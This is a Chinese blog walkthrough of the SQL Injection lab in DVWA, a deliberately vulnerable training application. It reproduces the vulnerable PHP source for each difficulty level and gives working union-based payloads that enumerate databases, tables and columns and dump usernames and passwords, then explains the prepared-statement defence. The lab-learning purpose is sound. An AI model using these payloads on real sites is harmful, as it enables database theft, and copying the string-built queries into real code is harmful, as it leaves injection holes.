DVWA靶场-sql注入(sqlInjection)

最新推荐文章于 2023-12-14 14:02:41 发布
最新推荐文章于 2023-12-14 14:02:41 发布
阅读量5.8k 收藏 12
点赞数
分类专栏: DVWA靶场 文章标签: sql 数据库 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43707926/article/details/123404671
版权

第七关:SQL Injection

      SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。

Low

<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
    // Get input
    $id = $_REQUEST[ 'id' ];
    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }
            mysqli_close($GLOBALS["___mysqli_ston"]);
            break;
        case SQLITE:
            global $sqlite_db_connection;
            #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);
            #$sqlite_db_connection->enableExceptions(true);
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }
            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];
                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    } 
}
?>

      对源码分析得,注入点是id,并且是字符型注入,服务端接收id参数,没有做任何处理,并且有回显,和报错详情,可以使用联合查询和报错注入以及时间盲注来实现手工注入。
      加'页面报错
在这里插入图片描述

利用order by判断字段数
在这里插入图片描述
在这里插入图片描述

使用union判断回显位置

在这里插入图片描述

使用联合注入爆出数据库的库名和版本
在这里插入图片描述

爆出数据库中所有得库名:id=-1' union select 1,group_concat(schema_name) from information_schema.schemata#
在这里插入图片描述

爆出当前数据库所有的表名:id=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema="dvwa"#
在这里插入图片描述

爆出当前表中所有的字段名:id=-1' union select 1,group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="dvwa"#
在这里插入图片描述

查询表中的数据
在这里插入图片描述

Medium

<?php
if( isset( $_POST[ 'Submit' ] ) ) {
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Display values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }
            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    }
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>

代码中使用了mysql_real_escape_string函数对特殊符号进行转义,页面中也使用下拉框来避免用户的输入,且使用POST进行数据提交
虽然使用了POST进行数据提交,但是可以使用burp suite抓包获取参数信息,利用google插件hackbar进行数据提交,首先判断注入类型,之后判断字段数,后面的步骤与low中类似。
在这里插入图片描述

High

<?php
if( isset( $_SESSION [ 'id' ] ) ) {
    // Get input
    $id = $_SESSION[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
            }

            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            #print $query;
            try {
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
                while ($row = $results->fetchArray()) {
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
            } else {
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    }
}
?>

从源码中可以看出,High级别的代码只是在sql查询语句中添加了limit限制,以此防止多条数据显示。但是我们可以使用#进行注释,所以手工注入的过程与low中的类似。
在进行手工注入时,根据代码使用的payload为1' union select 1,2;#,需要添加分号。
由于手工注入与low代码类似,所以使用1' union select group_concat(user_id,first_name),group_concat(password) from users;#显示结果
在这里插入图片描述

需要特别提到的是,High级别的查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,此做法目的是为了防止sqlmap注入,因为sqlmap在注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,就没办法进行注入。

Impossible

<?php
if( isset( $_GET[ 'Submit' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
        $id = intval ($id);
        switch ($_DVWA['SQLI_DB']) {
            case MYSQL:
                // Check the database
                $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
                $data->bindParam( ':id', $id, PDO::PARAM_INT );
                $data->execute();
                $row = $data->fetch();

                // Make sure only 1 result is returned
                if( $data->rowCount() == 1 ) {
                    // Get values
                    $first = $row[ 'first_name' ];
                    $last  = $row[ 'last_name' ];

                    // Feedback for end user
                    echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                }
                break;
            case SQLITE:
                global $sqlite_db_connection;

                $stmt = $sqlite_db_connection->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1;' );
                $stmt->bindValue(':id',$id,SQLITE3_INTEGER);
                $result = $stmt->execute();
                $result->finalize();
                if ($result !== false) {
                    // There is no way to get the number of rows returned
                    // This checks the number of columns (not rows) just
                    // as a precaution, but it won't stop someone dumping
                    // multiple rows and viewing them one at a time.

                    $num_columns = $result->numColumns();
                    if ($num_columns == 2) {
                        $row = $result->fetchArray();

                        // Get values
                        $first = $row[ 'first_name' ];
                        $last  = $row[ 'last_name' ];

                        // Feedback for end user
                        echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
                    }
                }

                break;
        }
    }
}
// Generate Anti-CSRF token
generateSessionToken();
?>

Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti-CSRFtoken机制的加入了进一步提高了安全性。

zerollone
关注
  • 0
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
dvwa靶场通关之sql injection
07-19
dvwa靶场通关之sql injection
DVWA靶场SQL Injection(SQL注入
m0_51150495的博客
06-08 1364
1.找到注入点;2.通过回显找到闭合方式;3.使用order by判断列数;4.使用union select判断显示位;5.使用union select爆出数据库名和版本号;6.已知数据库名后使用union select爆出表名和列名;7.最后爆出列名内所需信息,如user和password;8.此外还可使用union select来读取文件。1.输入1‘发现有如下闭合报错,则判断存在注入点,2.输入1''后出现回显,说明闭合为单引号'3. 判断列数,输入至1' order by 3#时出现报错,说明列数为
DVWA靶场中SQL注入
剁椒鱼头没剁椒的博客
12-13 5410
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型注入
dvwa靶场之sql注入
m0_63314341的博客
02-19 1319
sql注入是指通过分析代码,输入字符达到查找数据库中用户信息的一种行为,会导致用户账户的暴露 接下来我们先来分析一下源代码 SELECT first_name, last_name FROM users WHERE user_id = '$id' 其中重点则是上面的这段代码,这是对于数据库的一段查找代码 当我们为$id这个变量赋值时便会带入这段代码对数据库进行查询 ...
DVWA靶场-SQL Injection(难度低、中、高)-sqlmap自动化漏洞扫描
最新发布
weixin_43850721的博客
12-14 1454
此处使用docker容器搭建靶场。使用docker平台即可实现靶场的快速搭建,比较方便。使用docker搜索dvwa镜像:docker search dvwa。此处选择第一个镜像文件下载:docker pull citizenstig/dvwa。下载完毕后,可以使用docker images来查看所有的镜像,从中可以找到dvwa
SQL注入攻击的原理、分类和防御方法
热门推荐
Andrew的博客
02-27 1万+
一.SQL注入攻击原理 恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中,同时程序本身对用户输入内容过分信任而未对恶意用户插入的SQL语句进行过滤,导致SQL语句直接被服务端执行。   二.SQL注入攻击分类 (1)注入点的不同分类 数字类型的注入 字符串类型的注入 (2)提交方式的不同分类 GET注入 POST注入 COOKIE注入 HTTP注入 (3)获取信息的方...
DVWA靶场通关(SQL注入
m0_56010012的博客
03-09 1万+
SQL Injection(SQL注入)概念 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入常规思路
DVWA靶场之SQL注入通关详解
qq_62169455的博客
06-27 2731
获得字段中的数据,使用查询语句:1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #。获取表中的字段名,当输入查询语句(1 union select 1,column_name from information_schema.columns where table_name='users')后,会发现报错了,原因是语句中含有单引号。
Kali linux在DVWA靶场的SQL注入
qq_74298120的博客
06-20 1545
SQL注入是一种常见的攻击方式,攻击者通过利用Web应用程序或其他应用程序对数据库的查询进行注入,掌控数据库系统,甚至控制整个应用程序。为了加强Web应用程序的安全性,学习SQL注入攻击技能的同时也要了解防御措施。
DVWA靶场—sql闯关
oiadkt的博客
05-22 207
DVWA—sql闯关
关于DVWA靶场SQL Injection(low,medium,high)代码分析及注入分析
qq_22792465的博客
06-10 361
下图为源码中提交表单action='#'的作用是将数据提交到当前页面。
DVWA下的SQL注入
07-25
SQL
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
kali2021.3安装dvwa靶场
02-24
适用人群:刚刚学习kali的爱好者 dvwa是一个入门web渗透的典型靶场,有的朋友喜欢安装到kali机里,所以我编辑了这个教程供朋友们参考,亲自验证有效的!!!
DVWA综合靶场练习:SQL injection-低中高
流浪法师的博客
05-26 202
DVWA综合靶场练习:SQL injection-低中高
sql手工注入dvwa初级靶场
太阳照耀我走四方
02-13 1427
sql手工注入dvwa靶场
DVWA靶场通关记录(SQL注入)
weixin_73557450的博客
05-13 845
在MySQL中,自带的库为information_schema,其中包含MySQL中所有的数据库信息,包括所有库名、表名和列名。可以通过这个自带库获取信息。其中的表tables存储表名,表columns存储列名,通过句点“.”来连接上下级关系,例如:information_schema.tables。使用database()语句可以查询当前所在的数据库名称,user()可以查询当前登录的用户名。
SQL注入DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 4897
SQL注入DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
dvwa靶场sql注入
08-15
DVWA(Damn Vulnerable Web Application)是一个故意设计有漏洞的Web应用程序,它被广泛用作安全测试和学习的实践平台。在DVWA靶场中,SQL注入是其中一个常见的漏洞。 SQL注入是一种利用现有应用程序的漏洞,将恶意的SQL命令插入到Web表单提交或输入的查询字符串中,从而欺骗服务器执行恶意的SQL命令。攻击者可以利用SQL注入来绕过应用程序的验证和访问控制,从而执行未经授权的操作。 在DVWA靶场中,你可以通过注入恶意的SQL语句来获取存在安全漏洞的网站上的数据库信息。例如,通过猜解SQL查询语句中的字段数,你可以尝试构造不同的注入语句来获取敏感数据。另外,你也可以使用联合查询来查找数据库中的表。 举个例子,当你在DVWA靶场中尝试查找数据库中的表时,你可以使用以下注入语句: id=2 union select 1,table_name from information_schema.tables where table_schema=(select database())#&Submit=Submit 这个注入语句通过联合查询的方式,从information_schema.tables表中获取当前数据库中的所有表名,并将结果返回给你。 需要注意的是,在实际环境中,SQL注入是一种非常危险的漏洞。为了防止SQL注入攻击,开发人员应该采取安全编码实践,比如使用参数化查询或者ORM框架来避免动态拼接SQL语句。同时,对于使用DVWA靶场进行学习和测试的用户,务必遵守合法和道德的原则,不要在未经授权的情况下攻击他人的系统。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [DVWA靶场通关(SQL注入)](https://blog.csdn.net/m0_56010012/article/details/123353103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值